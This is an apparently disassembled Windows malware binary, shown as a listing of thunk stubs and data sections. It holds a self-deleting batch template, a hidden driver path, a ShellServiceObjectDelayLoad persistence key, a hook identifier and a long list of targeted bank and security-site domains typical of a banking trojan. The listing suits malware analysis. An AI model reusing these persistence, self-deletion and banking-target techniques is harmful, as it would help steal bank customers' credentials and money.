sub_40C4A0 proc near ; CODE XREF: sub_404602+73�p
jmp ds:dword_447490
sub_40C4A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4AC proc near ; CODE XREF: sub_404602+A3�p
jmp ds:dword_447494
sub_40C4AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4B8 proc near ; CODE XREF: sub_404602+2E�p
jmp ds:dword_447498
sub_40C4B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4C4 proc near ; CODE XREF: sub_40A4E2+7C1�p
jmp ds:dword_44749C
sub_40C4C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4D0 proc near ; CODE XREF: sub_40A4E2+7CF�p
jmp ds:dword_4474A0
sub_40C4D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4DC proc near ; CODE XREF: sub_408C98+256�p
; sub_408C98+38B�p ...
jmp ds:dword_4474A4
sub_40C4DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4E8 proc near ; CODE XREF: sub_40507F+64�p
; sub_40507F+CA�p ...
jmp ds:dword_4474A8
sub_40C4E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4F4 proc near ; CODE XREF: sub_40ADF7+1EB�p
jmp ds:dword_4474AC
sub_40C4F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C500 proc near ; CODE XREF: sub_408C98+77�p
; sub_40ADF7+86F�p
jmp ds:dword_4474B0
sub_40C500 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C50C proc near ; CODE XREF: sub_408C98+FD�p
; sub_408C98+16A�p ...
jmp ds:dword_4474B4
sub_40C50C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C518 proc near ; CODE XREF: sub_40ADF7+202�p
; sub_40ADF7+77A�p
jmp ds:dword_4474B8
sub_40C518 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C524 proc near ; CODE XREF: sub_40ADF7+175�p
jmp ds:dword_4474BC
sub_40C524 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C530 proc near ; CODE XREF: sub_40ADF7+882�p
jmp ds:dword_4474C0
sub_40C530 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C53C proc near ; CODE XREF: sub_40ACD5+10F�p
jmp ds:dword_4474C4
sub_40C53C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C548 proc near ; CODE XREF: sub_40A4E2+489�p
jmp ds:dword_4474D0
sub_40C548 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C554 proc near ; CODE XREF: sub_40ADF7+298�p
jmp ds:dword_4474D4
sub_40C554 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C560 proc near ; CODE XREF: sub_40ADF7+271�p
; sub_40ADF7+27D�p
jmp ds:dword_4474D8
sub_40C560 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C56C proc near ; CODE XREF: sub_40ADF7+2C0�p
jmp ds:dword_4474DC
sub_40C56C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C578 proc near ; CODE XREF: sub_408C98+221�p
; sub_408C98+85A�p
jmp ds:dword_4474E0
sub_40C578 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C584 proc near ; CODE XREF: sub_405217:loc_405254�p
jmp ds:dword_4474EC
sub_40C584 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C590 proc near ; CODE XREF: sub_405217+76�p
jmp ds:dword_4474F0
sub_40C590 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C59C proc near ; CODE XREF: sub_4015C0+39�p
; sub_404156+57�p
jmp ds:dword_4474F4
sub_40C59C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5A8 proc near ; CODE XREF: sub_4014AA+5F�p
; sub_4015C0+86�p ...
jmp ds:dword_4474F8
sub_40C5A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5B4 proc near ; CODE XREF: sub_4014AA+1F�p
jmp ds:dword_4474FC
sub_40C5B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5C0 proc near ; CODE XREF: sub_4014AA+49�p
jmp ds:dword_447500
sub_40C5C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5CC proc near ; CODE XREF: sub_4015C0+77�p
; sub_404156+7E�p
jmp ds:dword_447504
sub_40C5CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5D8 proc near ; CODE XREF: sub_402355+129�p
jmp ds:dword_447508
sub_40C5D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5E4 proc near ; CODE XREF: sub_402355+173�p
jmp ds:dword_44750C
sub_40C5E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5F0 proc near ; CODE XREF: sub_402355+159�p
jmp ds:dword_447510
sub_40C5F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5FC proc near ; CODE XREF: sub_40507F+1F�p
jmp ds:dword_447514
sub_40C5FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C608 proc near ; CODE XREF: sub_40507F+160�p
jmp ds:dword_447518
sub_40C608 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C614 proc near ; CODE XREF: sub_40507F+32�p
jmp ds:dword_44751C
sub_40C614 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C620 proc near ; CODE XREF: sub_4036DA+42�p
jmp ds:dword_447528
sub_40C620 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C62C proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44752C
sub_40C62C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C638 proc near ; CODE XREF: sub_406B40+179�p
; sub_406E3F+56�p ...
jmp ds:dword_447530
sub_40C638 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C644 proc near ; CODE XREF: sub_405409+101�p
; sub_405409+1A1�p
jmp ds:dword_447534
sub_40C644 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C650 proc near ; CODE XREF: sub_4096E4+CB4�p
; sub_4096E4+CD6�p
jmp ds:dword_447538
sub_40C650 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C65C proc near ; CODE XREF: sub_401219+74�p
; sub_4096E4+C4B�p ...
jmp ds:dword_44753C
sub_40C65C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C668 proc near ; CODE XREF: sub_4088C3+F9�p
jmp ds:dword_447540
sub_40C668 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C674 proc near ; CODE XREF: sub_40129C+1B�p
; .text:00401426�p ...
jmp ds:dword_447544
sub_40C674 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C680 proc near ; CODE XREF: sub_4063A9+5C�p
; sub_4063A9+1E4�p ...
jmp ds:dword_447548
sub_40C680 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C68C proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44754C
sub_40C68C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C698 proc near ; CODE XREF: sub_401719:loc_40173B�p
; sub_403D6F+4E�p ...
jmp ds:dword_447550
sub_40C698 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6A4 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_447554
sub_40C6A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6B0 proc near ; CODE XREF: sub_4038D6+28�p
; .text:00403994�p ...
jmp ds:dword_447558
sub_40C6B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6BC proc near ; CODE XREF: sub_4096E4+6D�p
; sub_40A4E2+124�p
jmp ds:dword_44755C
sub_40C6BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6C8 proc near ; CODE XREF: sub_4096E4+94D�p
jmp ds:dword_447560
sub_40C6C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6D4 proc near ; CODE XREF: sub_40352B+61�p
; sub_4035A9+4A�p ...
jmp ds:dword_447564
sub_40C6D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6E0 proc near ; CODE XREF: sub_40C0B4+17�p
jmp ds:dword_447568
sub_40C6E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6EC proc near ; CODE XREF: sub_4063A9+43E�p
jmp ds:dword_44756C
sub_40C6EC endp
; ---------------------------------------------------------------------------
align 1000h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002D3FC ( 185340.)
; Section size in file : 0002D3FC ( 185340.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 72656B5Ch ; sub_408403+92�r ...
aNel32_dll db 'nel32.dll',0
align 10h
dd 0
dd 5C732500h, 2E646D63h, 666970h, 0
db 0
db 2 dup(0), 5Ch
aCmd_exeCStartC db 'cmd.exe /C start c:\boot.sys',0
align 4
dd 3DDh dup(0)
dword_40DFBC dd 0 ; sub_40ACD5+D3�r
dword_40DFC0 dd 0 ; sub_401DE8+456�w ...
align 10h
dword_40DFD0 dd 40h dup(0) ; sub_4096E4+61C�o ...
dword_40E0D0 dd 0 ; sub_40364E:loc_4036D0�r
dd 442h dup(0)
dword_40F1DC dd 0 ; sub_401DE8+20B�w ...
dword_40F1E0 dd 0 ; sub_401DE8+3EE�r ...
dword_40F1E4 dd 0 ; sub_406E3F+1024�r ...
byte_40F1E8 db 0 ; DATA XREF: sub_401DE8+11D�w
align 10h
dword_40F1F0 dd 40h dup(0) ; sub_40A4E2+3A3�o ...
dword_40F2F0 dd 0 ; sub_402B12+DB�w ...
dd 0FFh dup(0)
dword_40F6F0 dd 0 ; sub_40383E+8E�r
dd 41Eh dup(0)
dword_41076C dd 0 ; sub_408C98+89E�r ...
dword_410770 dd 0 ; .text:00401C53�r
dd 433h dup(0)
dword_411840 dd 0 dd 0FFh dup(0)
dword_411C40 dd 785C7325h ; sub_404201+99�r
aSlfdlnt_bat db 'slfdlnt.bat',0
dd 0
dd 25000000h, 6D635C73h, 69702E64h, 66h, 0
dd 6D635C00h, 78652E64h, 65h, 0
dd 6F6C3A00h, 0A0D706Fh, 6C656440h, 3E732520h, 0D6C756Eh
dd 6669400Ah, 69786520h, 25207473h, 6F672073h, 6C206F74h
dd 0D706F6Fh, 6564400Ah, 7325206Ch, 6C756E3Eh, 0A0Dh, 0
dd 73250000h, 20432F20h, 7325h, 3F3h dup(0)
dword_412C90 dd 0 ; .text:0040262F�r
dd 400h dup(0)
dword_413C94 dd 0 ; sub_40ACD5+EF�r
dword_413C98 dd 0 ; sub_408C98+904�r ...
align 10h
byte_413CA0 db 0 ; DATA XREF: sub_401DE8+3F6�w
align 8
byte_413CA8 db 0 ; DATA XREF: sub_401DE8+56�w
; sub_401DE8+5B�r ...
align 4
dword_413CAC dd 0 ; sub_401DE8+1B5�w ...
dword_413CB0 dd 40h dup(0) ; sub_4096E4+873�o ...
dword_413DB0 dd 0 ; sub_402B12+CF�r ...
dd 0FFh dup(0)
dword_4141B0 dd 0 ; sub_40811F+87�r
dd 43Fh dup(0)
dword_4152B0 dd 0 ; .text:004019B0�r
dd 413h dup(0)
dword_416300 dd 0 ; sub_40470D+59�r
dd 423h dup(0)
dword_417390 dd 0 ; .text:loc_4022C7�r
dd 3F7h dup(0)
dword_418370 dd 94h ; sub_40A4E2+FB�o
dd 5, 1, 0A28h
dword_418380 dd 2 aServicePack2 db 'Service Pack 2',0
align 4
dd 1Fh dup(0)
dword_418410 dd 0 ; sub_4052CE:loc_40535E�r
dd 45Bh dup(0)
dword_419580 dd 0 ; .text:004014A0�r
dd 44Ah dup(0)
byte_41A6AC db 0 ; DATA XREF: sub_401DE8+3AC�w
; sub_401DE8+3B1�r
align 10h
dword_41A6B0 dd 0 ; sub_401DE8+D5�r ...
dword_41A6B4 dd 0 dword_41A6B8 dd 0 ; sub_402355+10E�r ...
align 10h
dword_41A6C0 dd 6972645Ch ; sub_40129C+98�r
aVersNdisrd_sys db 'vers\ndisrd.sys',0
dd 0
dd 6E650000h, 656C6261h, 667364h, 0
dd 73250000h, 2E73255Ch, 657865h, 437h dup(0)
dword_41B7D0 dd 0 ; sub_40A4E2+7A3�r ...
align 10h
dword_41B7E0 dd 0 ; sub_4068DC:loc_40695C�r
dd 417h dup(0)
dword_41C840 dd 0 ; sub_408C98+250�r
dword_41C844 dd 0 ; sub_408C98+71�r ...
dword_41C848 dd 0 ; sub_402563+11�r
align 10h
dword_41C850 dd 463Ah ; sub_4033BC+8D�r
dd 430h dup(0)
dword_41D914 dd 0 ; sub_401DE8:loc_401E69�w ...
dword_41D918 dd 0 ; sub_408C98+8C0�r ...
dword_41D91C dd 0 ; sub_40ACD5+BB�r
dword_41D920 dd 0 ; sub_408C98+3D0�r ...
dword_41D924 dd 0 ; sub_4024F3+5E�r
dword_41D928 dd 400000h ; sub_408C98+12C�r ...
dword_41D92C dd 0 ; sub_401DE8+A3�w ...
dword_41D930 dd 3430257Bh ; sub_403A31:loc_403ABD�r
aX04x04x04x04x0 db 'X%04X-%04X-%04X-%04X-%04X%04X%04X}',0
align 4
dd 0
a08x db '%08X',0
align 4
dd 73250000h, 2E73255Ch, 6C6C64h, 0
dd 534C4300h, 255C4449h, 6E495C73h, 636F7250h, 76726553h
dd 32337265h, 0
dd 68540000h, 64616572h, 4D676E69h, 6C65646Fh, 0
dd 70410000h, 6D747261h, 746E65h, 0
db 0
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay'
db 'Load',0
align 4
dd 432h dup(0)
dword_41EAC4 dd 0 ; sub_40ACD5+9D�r
align 10h
dword_41EAD0 dd 40h dup(0) ; sub_40A4E2+37D�o ...
byte_41EBD0 db 0 ; DATA XREF: sub_401DE8+169�w
align 4
dword_41EBD4 dd 0 ; sub_408C98+134�r ...
align 10h
byte_41EBE0 db 0 ; DATA XREF: sub_406E3F+176�o
; sub_406E3F+D2E�o ...
byte_41EBE1 db 0 ; DATA XREF: sub_406E3F+ECF�r
byte_41EBE2 db 0 ; DATA XREF: sub_406E3F+ED8�r
byte_41EBE3 db 0 ; DATA XREF: sub_406E3F+EE1�r
dd 3FFFh dup(0)
byte_42EBE0 db 0 ; DATA XREF: sub_401DE8+257�w
; sub_401DE8+25C�r
align 4
dword_42EBE4 dd 0 ; .text:004080D1�r ...
align 10h
dword_42EBF0 dd 0 ; .text:loc_401814�r
dd 440h dup(0)
dword_42FCF4 dd 0 dword_42FCF8 dd 0 ; sub_402355+28�r
dword_42FCFC dd 0 ; sub_408C98+276�r ...
byte_42FD00 db 0 ; DATA XREF: sub_401DE8+2E9�w
; sub_401DE8+2F3�r ...
align 10h
dword_42FD10 dd 0 ; sub_4045EF:loc_4045F8�r
dd 433h dup(0)
dword_430DE0 dd 0 ; sub_406DB4:loc_406E35�r
dd 429h dup(0)
dword_431E88 dd 0 ; sub_408C98+8E2�r ...
dword_431E8C dd 0 ; sub_40ADF7+23A�r ...
dword_431E90 dd 0 ; sub_408C98+385�r ...
align 10h
dword_431EA0 dd 0 ; .text:loc_408793�r
dd 3F7h dup(0)
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_403BAD+7F�o
; sub_403D6F+24B�o ...
dd 3Bh dup(0)
byte_432F80 db 0 ; DATA XREF: sub_40133E+8F�o
; sub_4081B0+FE�w ...
align 4
dd 3Fh dup(0)
dword_433080 dd 0 ; .text:00401AB7�r
dd 431h dup(0)
dword_434148 dd 0 ; sub_408C98+919�r ...
dword_43414C dd 0 ; sub_408C98+92E�r
dword_434150 dd 0 ; sub_401565:loc_4015B6�r
dd 3FFh dup(0)
dword_435150 dd 0 ; sub_404FE7+8E�r
dd 423h dup(0)
dword_4361E0 dd 0 ; .text:loc_401DDE�r
dd 453h dup(0)
dword_437330 dd 0 ; .text:0040170F�r
dd 413h dup(0)
dword_438380 dd 0 ; .text:loc_408A57�r
dd 3FEh dup(0)
dword_43937C dd 0 ; sub_40ADF7+242�r ...
byte_439380 db 0 ; DATA XREF: sub_401DE8+42C�w
align 10h
dword_439390 dd 0 ; .text:loc_40887C�r
dd 41Ah dup(0)
_bss ends
; Section 3. (virtual address 0003B000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43B000h
dd offset dword_40D000
dd 43A3FCh, 8000h, 0
dword_43B010 dd 0 ; sub_40109A+110�w ...
dword_43B014 dd 12FF74h dd 0
dword_43B01C dd 0 dword_43B020 dd 1 ; sub_401219+5A�r
dword_43B024 dd 14A4E0h ; sub_401219+54�r
dword_43B028 dd 1471D8h ; sub_401219+4E�r
dword_43B02C dd 0 ; sub_40109A:loc_401208�r
dword_43B030 dd 0 dword_43B034 dd 0 ; sub_40109A+87�r ...
dword_43B038 dd 0 dword_43B03C dd 14h dup(0) ; sub_40109A+8F�o
dword_43B08C dd 0 dword_43B090 dd 0 ; sub_40109A+32�w
dword_43B094 dd 7 ; sub_408C98+1BC�r ...
dword_43B098 dd 12h ; sub_408C98+13A�r ...
dword_43B09C dd 3Ah ; sub_40129C:loc_4012C3�r ...
aKkqhook_28 db 'KKQHOOK_28',0 ; DATA XREF: sub_40A482+14�o
; sub_40A4E2+4E2�o
aC db 'c',0
align 10h
dword_43B0B0 dd 0 ; sub_4096E4+147�r ...
dword_43B0B4 dd 46h ; sub_4096E4+CEE�r ...
off_43B0B8 dd offset aSiliconfirewar ; DATA XREF: sub_4096E4+100�r
; sub_4096E4+14D�r
; "siliconfireware.ru"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aWww_nomos_ru ; "www.nomos.ru"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
aM_kvwoh db 'm.K‚woH',0
aSoftwareMicros db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_4096E4+4FF�o
; sub_4096E4+597�o ...
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_4096E4+4FA�o
; sub_4096E4+592�o
align 4
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_4096E4+5F6�o
; sub_4096E4+795�o
aRT_2 db 'R t',0
align 4
dword_43B214 dd 0 ; sub_40ADF7:loc_40AF71�r ...
dword_43B218 dd 0 ; sub_40ADF7+88�r ...
aWtAj db 'wt,aj',0
dword_43B222 dd 836220h align 4
dword_43B228 dd 3Bh ; sub_401DE8+8D�w ...
align 10h
dd 12h
dword_43B234 dd 0 ; .text:loc_401432�r ...
dword_43B238 dd 6A3Fh, 7, 11hdword_43B244 dd 0 ; sub_401565:loc_401560�r ...
aVyfuC db '+vyfu C',0 ; DATA XREF: sub_4015C0+16�o
aPzlvp4 db 'PzL‚P4',0 ; DATA XREF: sub_4015C0+59�o
a7cx db '#7CX|',0 ; DATA XREF: sub_4015C0+96�o
align 10h
dd 1, 0Bh
dword_43B268 dd 0 ; .text:loc_4016BA�r ...
aXd9 db ' xd9',0 ; DATA XREF: sub_401719+52�o
align 4
dw 8
unicode 0, <>,0
dw 0Ah
unicode 0, <>,0
dword_43B27C dd 0 ; .text:loc_4017B7�r ...
a8l7 db '8l 7',0 ; DATA XREF: sub_40181E+1B�o
aYb db 'Y',0 ; DATA XREF: sub_40181E+49�o
aM7 db 'm7',0 ; DATA XREF: sub_40181E+98�o
align 4
dd 1, 0Bh
dword_43B294 dd 0 ; .text:loc_40195B�r ...
aXd9_0 db ' xd9',0 ; DATA XREF: .text:00401A02�o
align 10h
dd 4, 0Eh
dword_43B2A8 dd 0 ; .text:loc_401A4C�r ...
aA_ db '<A*_',0 ; DATA XREF: sub_401AC1+52�o
aB61 db 'B 61',0 ; DATA XREF: sub_401AC1+6E�o
align 4
dd 4, 0Eh
dword_43B2C0 dd 0 ; .text:loc_401BE8�r ...
aA__0 db '<A*_',0 ; DATA XREF: sub_401C5D+3F�o
align 4
dd 1, 0Eh
dword_43B2D4 dd 0 ; .text:loc_401D7F�r ...
byte_43B2D8 db 0 ; DATA XREF: sub_401DE8+C1�o
dword_43B2D9 dd 30396Ch byte_43B2DD db 0 ; DATA XREF: sub_401DE8+385�o
word_43B2DE dw 692Fh ; DATA XREF: sub_401DE8+39A�o
dd 0
off_43B2E4 dd offset loc_401E69 ; DATA XREF: sub_401DE8+75�r
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_4020B1
dd offset loc_402033
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_401EE9
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_401EE9
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_401EE9
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EB4
dd offset loc_401EB4
dd offset loc_401EE9
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
